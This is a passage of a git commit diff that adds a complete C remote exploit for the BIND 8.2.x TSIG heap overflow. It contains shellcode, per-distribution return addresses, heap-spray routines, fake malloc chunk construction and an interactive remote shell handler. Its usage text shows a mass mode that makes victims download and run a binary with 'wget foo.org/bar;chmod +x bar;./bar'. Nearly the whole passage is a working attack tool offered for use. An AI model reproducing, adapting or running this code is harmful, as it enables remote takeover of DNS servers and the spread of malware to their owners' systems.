+        "\xfe\x00\x00\x00\x89\xe1\x31\xc0\xb0\x66\xcd\x80"
+        "\xa8\xff\x75\x09\x66\x81\x7c\x24\x12\x34\x52\x74"
+        "\x0c\x5a\xf6\xc2\xff\x74\x4f\xfe\xca\x52\xeb\xe2"
+        "\x38\x5b\x31\xc9\xb1\x03\xfe\xc9\x31\xc0\xb0\x3f"
+        "\xcd\x80\x67\xe3\x02\xeb\xf3\x6a\x04\x6a\x00\x6a"
+        "\x12\x6a\x01\x53\xb8\x66\x00\x00\x00\xbb\x0e\x00"
+        "\x00\x00\x89\xe1\xcd\x80\x6a\x00\x6a\x00\x68\x2f"
+        "\x73\x68\x00\x68\x2f\x62\x69\x6e\x8d\x4c\x24\x08"
+        "\x8d\x54\x24\x0c\x89\x21\x89\xe3\x31\xc0\xb0\x0b"
+        "\xcd\x80\x31\xc0\xfe\xc0\xcd\x80";
+/* 34 byte x86/linux PIC arbitrary execute shellcode
+ */
+unsigned char   x86_lnx_execve[] =
+        "\xeb\x1b\x5f\x31\xc0\x50\x8a\x07\x47\x57\xae\x75"
+        "\xfd\x88\x67\xff\x48\x75\xf6\x5b\x53\x50\x5a\x89"
+        "\xe1\xb0\x0b\xcd\x80\xe8\xe0\xff\xff\xff";
+typedef struct target {
+        char    *name;
+        char    *verstr;
+        int     nl;
+        unsigned int ret_addr;
+        unsigned int retloc;
+} target_t;
+/* everything from 8.2 (included) to 8.2.3-REL (excluded) is vulnerable
+ */
+target_t        targets[]={
+        /* XXX: i (scut) think that retloc is always right, just retaddr
+         *      can vary. i guess it varies when using different configurations
+         *      so a way to reduce the effect is to send lots of tcp packets
+         *      with nops + shellcode and then use a retaddr above the one
+         *      returned by smilers script. like you send 10 * 64kb packets,
+         *      just use 0x081n0000, n = [567]
+         *
+         * get the offsets this way:
+         * strings /usr/sbin/named | grep 8.2 | tail -1
+         * md5sum /usr/sbin/named
+         * objdump --dynamic-reloc /usr/sbin/named | grep " close$"
+         * retaddr should be 0x08180000 in all cases
+         */
+        /* bind-8.2.2p5-7.deb, /usr/sbin/named 1ab35b7360bab29809706c2b440fc147 */
+        {"Debian 2.2 8.2.2p5-7 GOT", "8.2.2-P5-NOESW", 0, 0x08180000, 0x080b6d50 },
+        /* bind-8.2.2p5-11.deb, /usr/sbin/named bf5bf8aa378bbb135833f3d924746574 */
+        {"Debian 2.2 8.2.2p5-11 GOT", "8.2.2-P5-NOESW", 0, 0x08180000, 0x080b6f50 },
+        /* bind-8.2.2p7-1.deb, /usr/sbin/named fddc29d50b773125302013cea4fe86cf */
+        {"Debian 2.2 8.2.2p7-1 GOT", "8.2.2-P7-NOESW", 1, 0x08180000, 0x080b70b0 },
+        /* bind-8.2.2P5-12mdk.i586.rpm, /usr/sbin/named 96cb52c21f622d47315739ee4c480206 */
+        {"Mandrake 7.2 8.2.2-P5 GOT", "8.2.2-P5", 1, 0x08180000, 0x080d6a6c },
+        /* RedHat 5.2 uses 8.1.2 */
+        /* bind-8.2-6.i386.rpm, /usr/sbin/named */
+        {"RedHat 6.0 8.2 GOT", "8.2", 0, 0x08180000, 0x080c62ac },
+        /* bind-8.2.1-7.i386.rpm, /usr/sbin/named 9e1efa3d6eb65d1d12e9c3afcb1679de */
+        {"RedHat 6.1 8.2.1 GOT", "8.2.1", 0, 0x08180000, 0x080c3a2c },
+        /* bind-8.2.2_P3*?.rpm, /usr/sbin/named 40ae845243a678a5762a464f08a67ab5 */
+        {"RedHat 6.2 8.2.2-P3 GOT", "8.2.2-P3", 0, 0x08180000, 0x080c5170 },
+        /* bind-8.2.2_P5-9.rpm, /usr/sbin/named a74c76eca6d2bd6ad20a8258e6ba0562 */
+        {"RedHat 6.2 8.2.2-P5 GOT", "8.2.2-P5", 0, 0x08180000, 0x080c56ac },
+        /* bind-8.2.2_P5-25.i386.rpm, /usr/sbin/named ef247e20848ac07a3c5dde1d18d5e201 */
+        {"RedHat 7.0 8.2.2-P5 GOT", "8.2.2-P5", 1, 0x08180000, 0x080f7230 },
+        /* SuSE 6.0 to 6.2 use BIND 8.1.2 */
+        /* bind8.rpm, /usr/sbin/named 4afe958a1959918426572701dd650c4b */
+        {"SuSE 6.3 8.2.2-P5 GOT", "8.2.2-P5", 0, 0x08180000, 0x080d1d8c },
+        /* bind8.rpm, /usr/sbin/named b8f62f57b9140e7c9a6abb12b8cb9751 */
+        {"SuSE 6.4 8.2.2-P5 GOT", "8.2.2-P5", 0, 0x08180000, 0x080d0a8c },
+        /* bind8.rpm, /usr/sbin/named 4aa979a93e5e8b44d316a986d3008931 */
+        {"SuSE 7.0 8.2.3-T5B GOT", "8.2.3-T5B", 0, 0x08180000, 0x080d36cc },
+        {"SuSE 7.1 8.2.3-T9B GOT", "8.2.3-T9B", 1, 0x08180000, 0x080d5ca8 },
+        /* slack 4.0 uses 8.1.2 */
+        /* bind.tgz, /usr/sbin/named 6a2305085f8a3e50604c32337d354ff8 */
+        {"Slackware 7.0 8.2.2-REL GOT", "8.2.2-REL", 0, 0x08180000, 0x080c532c },
+        /* bind.tgz, /usr/sbin/named 1c7436aaab660c3c1c940e4e9c6847ec */
+        {"Slackware 7.1 8.2.2-P5 GOT", "8.2.2-P5", 1, 0x08180000, 0x080bfd0c },
+        {NULL, 0x0, 0x0 },
+};
+int             mass = 0,
+                check_version = 1;
+unsigned char * code = peername_code;
+unsigned int    code_len = sizeof (peername_code);
+int
+sleepvis (int seconds);
+void
+bind_version (struct addrinfo *addr, unsigned char *verbuf,
+        unsigned long int len);
+static int      sc_build_x86_lnx (unsigned char *target, size_t target_len,
+        unsigned char *shellcode, char **argv);
+int
+send_bogus (struct addrinfo *addr);
+int
+send_populators (struct addrinfo *addr, int count);
+int             target_cnt = sizeof(targets)/sizeof(target_t);
+target_t        *vec = &targets[0];
+#if 1
+int
+Xsend (int fd, unsigned char *buf, size_t len, int flags)
+{
+        int     n, tot = len;
+        while (len > 0) {
+                n = send (fd, buf, len, flags);
+                if (n <= 0)
+                        return (n);
+                len -= n;
+                buf += n;
+        }
+        return (tot);
+}
+#else
+#define Xsend send
+#endif
+#if 1
+int
+Xread (int fd, unsigned char *buf, size_t len)
+{
+        int             n, tot;
+        int             pdlen;
+        unsigned char   plen[2];
+        read (fd, plen, 2);
+        pdlen = ntohs (*(u_int16_t *)plen);
+        if (pdlen > len)
+                return (-1);
+        len = pdlen;
+        tot = len;
+        while (len > 0) {
+                n = read (fd, buf, len);
+                if (n < 0)
+                        return (n);
+                len -= n;
+                if (n == 0)
+                        return (len);
+                buf += n;
+        }
+        return (tot);
+}
+#else
+#define Xread read
+#endif
+void
+runshell (int fd)
+{
+        fd_set  rset;
+        int     n;
+        char    buffer[4096];
+        for (;;) {
+                FD_ZERO (&rset);
+                FD_SET (fd, &rset);
+                FD_SET (STDIN_FILENO, &rset);
+                n = select (fd + 1, &rset, NULL, NULL, NULL);
+                if (n <= 0) {
+                        perror ("select");
+                        return;
+                }
+                if (FD_ISSET (fd, &rset)) {
+                        n = recv (fd, buffer, sizeof (buffer), 0);
+                        if (n <= 0) {
+                                perror ("select");
+                                break;
+                        }
+                        write (STDOUT_FILENO, buffer, n);
+                }
+                if (FD_ISSET (STDIN_FILENO, &rset)) {
+                        n = read (STDIN_FILENO, buffer, sizeof (buffer));
+                        if (n <= 0) {
+                                perror ("select");
+                                break;
+                        }
+                        Xsend (fd, buffer, n, 0);
+                }
+        }
+        return;
+}
+int
+get_warez_connection (struct addrinfo *addr)
+{
+        int     s, val = 1;
+        struct sockaddr_in sin;
+        s = socket (addr->ai_family, addr->ai_socktype, addr->ai_protocol);
+        if (s < 0) {
+                return (-1);
+        }
+        if (setsockopt (s, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val)) < 0) {
+                close (s);
+                return (-1);
+        }
+        memset (&sin, 0, sizeof(sin));
+        sin.sin_family = addr->ai_family;
+        sin.sin_port = htons (13394); /* shellcode checks for this... */
+        sin.sin_addr.s_addr = 0;
+        if (bind (s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
+                close (s);
+                return (-1);
+        }
+        if (connect (s, addr->ai_addr, addr->ai_addrlen) < 0) {
+                close (s);
+                return (-1);
+        }
+        return (s);
+}
+int
+get_connection (struct addrinfo *addr)
+{
+        int     s;
+        s = socket (addr->ai_family, addr->ai_socktype, addr->ai_protocol);
+        if (s < 0) {
+                return (-1);
+        }
+        if (connect (s, addr->ai_addr, addr->ai_addrlen) < 0) {
+                close (s);
+                return (-1);
+        }
+        fcntl (s, F_SETFL, O_SYNC | fcntl (s, F_GETFL));
+        return (s);
+}
+/* since a malloc packet is always aligned on an 8 byte boundary we can 
+ * assume at least a 2 byte alignment.
+ * Since (ret+12) is overwritten with garbage we need to jump over that
+ * with each instruction and it also needs to look like a domain name.
+ */
+unsigned char tesops[]=
+        "\x27\x90\xeb\x12\xeb\x12\xeb\x12\xeb\x12"
+        "\xeb\x12\xeb\x12\xeb\x12\xeb\x12\xeb\x12"
+        "\xeb\x12\xeb\x12\xeb\x12\xeb\x12\xeb\x12"
+        "\xeb\x12\xeb\x12\xeb\x12\xeb\x12\xeb\x12";
+/* just nops plus a jump to skip the first byte of the shellcode, note
+ * we shouldn't return into this part, but its relatively small
+ */
+unsigned char finops[]=
+        "\x14\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x01";
+int
+mk_nops (unsigned char *cp)
+{
+        unsigned char *orig = cp;
+        int     ctr;
+        for (ctr = 0; ctr < 1498; ++ctr) {
+                memcpy (cp, tesops, 40);
+                cp += 40;
+        }
+        memcpy (cp, finops, 21);
+        cp += 21;
+        return (cp - orig);     
+}
+int
+mk_overwrite_pkt (unsigned char *cp)
+{
+        unsigned char *orig = cp;
+        HEADER *hdr = (HEADER *)cp;
+        memset (cp, 0, NS_HFIXEDSZ);
+        hdr->id = 0;
+        hdr->rd = 1;
+        hdr->arcount = hdr->qdcount = htons (1);
+        cp += NS_HFIXEDSZ;
+        cp += mk_nops (cp);
+#if 0
+        memcpy (cp, vec->code, vec->code_len);
+        cp += vec->code_len;
+#endif
+#if 1
+        cp += dns_mklongdn (cp, 0xffff - 25 - (cp - orig));
+#else /* harmless, for testing... */
+        cp += dns_mklongdn (cp, 0xffff - 25 - (cp - orig) - 40);
+#endif
+        *cp++ = '\0';
+        NS_PUT16 (ns_t_a, cp);
+        NS_PUT16 (ns_c_in, cp);
+        *cp++ = '\0';
+        NS_PUT16 (250, cp);
+        *cp++ = '\0';
+        return (cp - orig);
+}
+int
+mk_malloc_pkt (unsigned char *cp)
+{
+        unsigned char *orig = cp;
+        memset (cp, 'P', 0x10 - 8);
+        cp += 0x10 - 8;
+        /* fake 1 indicate previous is in use */
+        NS_LPUT32 (0, cp);
+        NS_LPUT32 (0x11, cp);
+        NS_LPUT32 (vec->retloc - 12, cp);
+        NS_LPUT32 (vec->ret_addr, cp);
+        /* fake 2 indicate previous isnt in use */
+        NS_LPUT32 (0x10, cp);
+        NS_LPUT32 (0x10, cp);
+        NS_LPUT32 (0xf4f4f4f4, cp);
+        NS_LPUT32 (0x4f4f4f4f, cp);
+        /* fake 3 indicate previous is in use */
+        NS_LPUT32 (0x0, cp);
+        NS_LPUT32 (0x11, cp);
+        NS_LPUT32 (0xe3e3e3e3, cp);
+        NS_LPUT32 (0x3e3e3e3e, cp);
+        return (cp - orig);
+}
+int
+sleepvis (int seconds)
+{
+        fprintf (stderr, "%2d", seconds);
+        while (seconds > 0) {
+                fflush (stderr);
+                seconds -= 1;
+                sleep (1);
+                fprintf (stderr, "\b\b%2d", seconds);
+        }
+        fprintf (stderr, "\b\b");
+        fflush (stderr);
+        return (0);
+}
+int
+send_bogus (struct addrinfo *addr)
+{
+        int             sock;
+        unsigned char   bogus[2] = "\x00\x00";
+        sleep (10);
+        sock = get_connection (addr);
+        if (sock < 0) {
+                fprintf (stderr, "# looks alright, BIND either crashed or spinning in shellcode\n");
+                return (1);
+        } else {
+                fprintf (stderr, "# BIND is still reacting, either not vulnerable or GOT not triggered\n");
+                fprintf (stderr, "# triggering close()\n");
+        }
+        if (Xsend (sock, bogus, 2, 0) < 0) {
+                perror ("send_bogus:send");
+                exit (EXIT_FAILURE);
+        }
+        close (sock);
+        return (0);
+}
+int
+send_populators (struct addrinfo *addr, int count)
+{
+        int             i;
+        int             sock[64];
+        unsigned char   len[2];
+        unsigned char   dbuf[65536];
+        unsigned int    dbuf_len_tell = 65532;
+        unsigned int    dbuf_len_send;
+        if (count > (sizeof (sock) / sizeof (sock[0]))) {
+                fprintf (stderr, "to keep the balance of sanity is sometimes impossible\n");
+                exit (EXIT_FAILURE);
+        }
+        fprintf (stderr, "sending %d packets, 64kb each. will give %lu bytes of nop space\n",
+                count, (unsigned long int) count * (dbuf_len_tell - code_len));
+        fprintf (stderr, "for each packet we will leave one socket open\n");
+        fprintf (stderr, "[");
+        fflush (stderr);
+        /* build buffer: <jmp-nops> <shellcode> <remspace>
+         * cant be simpler ;)
+         * remspace is not send to the remote side at all
+         */
+        dbuf_len_send = dbuf_len_tell - 64;
+        for (i = 0 ; i < (dbuf_len_send - code_len) ; i += 2) {
+                dbuf[i] = '\xeb';
+                dbuf[i + 1] = '\x12';
+        }
+        for (i = (dbuf_len_send - code_len - 0x20) ;
+                i < (dbuf_len_send - code_len) ; ++i)
+        {
+                dbuf[i] = '\x90';
+//              dbuf[i] = '\xcc';
+        }
+        memcpy (dbuf + dbuf_len_send - code_len,
+                code, code_len);
+        for (i = 0 ; i < count ; ++i) {
+                fprintf (stderr, "%1d", i % 10);
+                fflush (stderr);
+                sock[i] = get_connection (addr);
+                if (sock[i] < 0)
+                        continue;
+                *(u_int16_t *)len = htons (dbuf_len_tell);
+                if (Xsend (sock[i], len, 2, 0) < 0) {
+                        perror ("send_populators:len-sending:send");
+                        exit (EXIT_FAILURE);
+                }
+                if (Xsend (sock[i], dbuf, dbuf_len_send, 0) < 0) {
+                        perror ("send_populators:dbuf-sending:send");
+                        exit (EXIT_FAILURE);
+                }
+        }
+        fprintf (stderr, "]\n\n");
+        fprintf (stderr, "successfully set up populator traps\n");
+        return (0);
+}
+int
+send_expl (struct addrinfo *addr)
+{
+        int     s1 = -1, s2 = -1, s3 = -1, s4 = -1, err = 0;
+        int     owrite_len, mallox_len, blue =0;
+        unsigned char owrite[65536], len[2];
+        unsigned char mallox[0x2000];
+        /* create the packets first */
+        owrite_len = mk_overwrite_pkt (owrite);
+        if (owrite_len > 65535) {
+                fprintf (stderr, "fuck..\n");
+                return (-1);
+        }
+        mallox_len = mk_malloc_pkt (mallox);
+        s1 = get_connection (addr);
+        s2 = get_connection (addr);
+        s3 = get_connection (addr);
+        if (s1 < 0 || s2 < 0 || s3 < 0) {
+                perror ("get_connection");
+                goto fail;
+        }
+        /* make named allocate the packet data */
+        *(u_int16_t *)len = htons (0x60);
+        if (Xsend (s1, len, 2, 0) < 0) {
+                perror ("send");
+                goto fail;
+        }
+        *(u_int16_t *)len = htons (owrite_len);
+        if (Xsend (s2, len, 2, 0) < 0) {
+                perror ("send");
+                goto fail;
+        }
+        /* server still expects more.. */
+        *(u_int16_t *)len = htons (mallox_len + 1);
+        if (Xsend (s3, len, 2, 0) < 2) {
+                perror ("send");
+                goto fail;
+        }
+        printf ("sending main part of malloc packet...\n");
+        if (Xsend (s3, mallox, mallox_len, 0) < (mallox_len)) {
+                perror ("malloc send");
+                goto fail;
+        }
+        sleepvis (5);
+        printf ("sending overwrite packet...\n");
+        /* overwrite the 3rd packet with the 2nd */
+        if (Xsend (s2, owrite, owrite_len, 0) < owrite_len) {
+                perror ("owrite_send");
+                goto fail;
+        }
+        while (blue < 65300) {
+                int     n;
+                n = recv (s2, owrite, sizeof(owrite), 0);
+                if (n <= 0)
+                        break;
+                blue += n;
+        }
+        close (s2);
+        s4 = get_warez_connection (addr);
+        if (s4 < 0) {
+                perror ("get_warez_connection");
+                return (-1);
+        }
+        fprintf (stderr, "sent overwrite packet...sleeping for 2 seconds\n");
+        sleepvis (2);
+        /* experimental reliability patch */
+        fprintf (stderr, "sending dummy packets with shellcode to populate the heap\n");
+        send_populators (addr, 20);
+        sleepvis (5);
+        fprintf (stderr, "freeing packet\n");
+        /* free the 3rd packet */
+        if (Xsend (s3, "a",1,0) < 1) {
+                perror ("malloc 2 send");
+                goto fail;
+        }
+        close(s3);
+        sleepvis (2);
+        fprintf (stderr, "doing close\n");
+        send (s1, mallox, 0x60, 0);
+        close (s1);
+        sleepvis (2);
+        fprintf (stderr, "doing fork-away and bogus connect to trigger close...\n");
+        if (fork () == 0) {
+                send_bogus (addr);
+                exit (EXIT_SUCCESS);
+        }
+        if (mass == 1) {
+                sleepvis (5);
+                fprintf (stderr, "egg placed, may the force be with you.\n");
+                exit (EXIT_SUCCESS);
+        }
+        fprintf (stderr, "trying shell....\n");
+        fprintf (stderr, "advice: be patient, if it does not seem react here, wait. BIND may be in\n");
+        fprintf (stderr, "        an unstable state, but we will send a bogus packet in 10 seconds.\n");
+        fprintf (stderr, "        if it does react after some minutes, but behaves blocky,\n");
+        fprintf (stderr, "        something went wrong, but you can still type blind and wait a\n");
+        fprintf (stderr, "        few minutes for it to react, sorry.\n");
+        fprintf (stderr, "-------------------------------------------------------------------------\n");
+#ifndef TRUST_THE_MAGIC
+        write (s4, xp_initstr, strlen (xp_initstr));
+#endif
+        runshell (s4);
+        err++;
+fail:
+        err--;
+        close (s1);
+        close (s2);
+        close (s3);
+        return (err);
+}
+int
+send_exploit (char *hname)
+{
+        struct addrinfo *addr, hints;
+        int err = 0; 
+        memset (&hints, 0, sizeof(hints));
+        hints.ai_flags = AI_CANONNAME;
+        hints.ai_family = PF_UNSPEC;
+        hints.ai_socktype = SOCK_STREAM;
+        err = getaddrinfo (hname, "domain", &hints, &addr);
+        if (err) {
+                fprintf (stderr, "getaddrinfo: %s\n", gai_strerror (err));
+                return (-1);
+        }
+        if (check_version) {
+                unsigned char   verbuf[64];
+                fprintf (stderr, "probing for BIND version %s\n", vec->verstr);
+                memset (verbuf, '\0', sizeof (verbuf));
+                bind_version (addr, verbuf, sizeof (verbuf));
+                verbuf[sizeof (verbuf) - 1] = '\0';
+                if (strcmp (verbuf, vec->verstr) != 0) {
+                        fprintf (stderr, "remote uses BIND version \"%s\",\n"
+                                "while the vector is for BIND version \"%s\".\n"
+                                "use -n option to override, but know what you do\n",
+                                verbuf, vec->verstr);
+                        exit (EXIT_FAILURE);
+                }
+                fprintf (stderr, "remote uses correct version: \"%s\"\n", verbuf);
+        }
+        err = send_expl (addr);
+        freeaddrinfo (addr);
+        return (err);
+}
+void
+usage (char *prg)
+{
+        fprintf (stderr, "usage: %s [-h ip] [-t target] [mass commands]\n\n", prg);
+        fprintf (stderr, "-c           mass mode. experts only\n");
+        fprintf (stderr, "-n           do NOT check for the correct BIND version\n");
+        fprintf (stderr, "-h ip        set target ip (default: 127.0.0.1)\n");
+        fprintf (stderr, "-t target    set target, zero gives a list\n\n");
+        fprintf (stderr, "example: %s -h 127.0.0.1 -t 4 -c -- /bin/sh -c \\\n"
+                "\t\"cd /tmp;wget foo.org/bar;chmod +x bar;./bar\"\n\n", prg);
+        exit (EXIT_FAILURE);
+}
+int
+main (int argc, char **argv)
+{
+        char c;
+        char * dest = "127.0.0.1";
+        int target = 0;
+        unsigned char   codebuf[256];
+        if (argc == 1)
+                usage (argv[0]);
+        while ((c = getopt (argc, argv, "cnh:t:")) != EOF) {
+                switch (c) {
+                case 'c':
+                        mass = 1;
+                        break;
+                case 'n':
+                        check_version = 0;
+                        break;
+                case 'h':
+                        dest = optarg;
+                        break;
+                case 't':
+                        if (atoi (optarg) == 0) {
+                                target_t *ptr;
+                                int ctr;
+                                printf ("\tno   system                          BIND version\n");
+                                printf ("\t---  ------------------------------  ---------------\n");
+                                for (ctr = 1, ptr = targets; ptr->name; ++ptr, ++ctr)
+                                        fprintf (stderr, "\t%2d:  %-30s  %-15s\n%s", ctr,
+                                                ptr->name, ptr->verstr,
+                                                ptr->nl == 1 ? "\n" : "");
+                                exit (EXIT_FAILURE);
+                        }
+                        target = atoi (optarg);
+                        break;
+                default:
+                        usage (argv[0]);
+                        break;
+                }
+        }
+        /* one remaining argument (script file name)
+         */
+        if (mass == 1 && (argc - optind) == 0)
+                usage (argv[0]);
+        if (mass == 1) {
+                int     len;
+                len = sc_build_x86_lnx (codebuf, sizeof (codebuf),
+                        x86_lnx_execve, &argv[optind]);
+                fprintf (stderr, "created %d byte execve shellcode\n", len);
+                code = codebuf;
+                code_len = len;
+        }
+        target -= 1;
+        if (target >= target_cnt)
+                target = 0;
+        vec = &targets[target];
+        fprintf (stderr, "using: %s\n", vec->name);
+        fprintf (stderr, "against: %s\n", dest);
+        fprintf (stderr, "\n");
+        srand (time (NULL));
+        send_exploit (dest);
+        return (EXIT_SUCCESS);
+}
+void
+bind_version (struct addrinfo *addr, unsigned char *verbuf,
+        unsigned long int verlen)
+{
+        int                     s1;
+        unsigned char           pkt[] =
+                "\x00\x06\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"
+                "\x07\x76\x65\x72\x73\x69\x6f\x6e\x04\x62\x69\x6e"
+                "\x64\x00\x00\x10\x00\x03";
+        unsigned char *         ver;
+        unsigned char           resp[256];
+        unsigned char           len[2];
+        s1 = get_connection (addr);
+        if (s1 < 0) {
+                perror ("bind_version:connect");
+                exit (EXIT_FAILURE);
+        }
+        *(u_int16_t *)len = htons (30);
+        if (Xsend (s1, len, 2, 0) < 0) {
+                perror ("bind_version:send-len");
+                exit (EXIT_FAILURE);
+        }
+        if (Xsend (s1, pkt, 30, 0) < 30) {
+                perror ("bind_version:send-data");
+                exit (EXIT_FAILURE);
+        }
+        memset (resp, '\0', sizeof (resp));
+        if (Xread (s1, resp, sizeof (resp) - 1) < 0) {
+                perror ("bind_version:read-data");
+                exit (EXIT_FAILURE);
+        }
+        ver = resp + sizeof (resp) - 1;
+        while (ver > resp && *ver == '\0')
+                --ver;
+        while (ver > resp && isprint (*ver) && *ver >= 0x20)
+                --ver;
+        if (*ver < 0x20)
+                ++ver;
+        strncpy (verbuf, ver, verlen);
+        close (s1);
+}
+static int
+sc_build_x86_lnx (unsigned char *target, size_t target_len, unsigned char *shellcode,
+        char **argv)
+{
+        int     i;
+        size_t  tl_orig = target_len;
+        if (strlen (shellcode) >= (target_len - 1))
+                return (-1);
+        memcpy (target, shellcode, strlen (shellcode));
+        target += strlen (shellcode);
+        target_len -= strlen (shellcode);
+        for (i = 0 ; argv[i] != NULL ; ++i)
+                ;
+        /* set argument count
+         */
+        target[0] = (unsigned char) i;
+        target++;
+        target_len--;
+        for ( ; i > 0 ; ) {
+                i -= 1;
+                if (strlen (argv[i]) >= target_len)
+                        return (-1);
+                printf ("[%3d/%3d] adding (%2d): %s\n",
+                        (tl_orig - target_len), tl_orig,
+                        strlen (argv[i]), argv[i]);
+                memcpy (target, argv[i], strlen (argv[i]));
+                target += strlen (argv[i]);
+                target_len -= strlen (argv[i]);
+                target[0] = (unsigned char) (i + 1);
+                target++;
+                target_len -= 1;
+        }
+        return (tl_orig - target_len);
+}
diff --git a/other/tsig/tcp.o b/other/tsig/tcp.o
new file mode 100644
index 0000000..6bc8907
--- /dev/null
+++ b/other/tsig/tcp.o
Binary files differ
diff --git a/other/tsig/tsig b/other/tsig/tsig
new file mode 100644
index 0000000..3b9d474
--- /dev/null
+++ b/other/tsig/tsig
Binary files differ
author	Root THC	2026-02-24 12:42:47 +0000
committer	Root THC	2026-02-24 12:42:47 +0000
commit	c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree	aefc355416b561111819de159ccbd86c3004cf88 /other/tsig
parent	073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)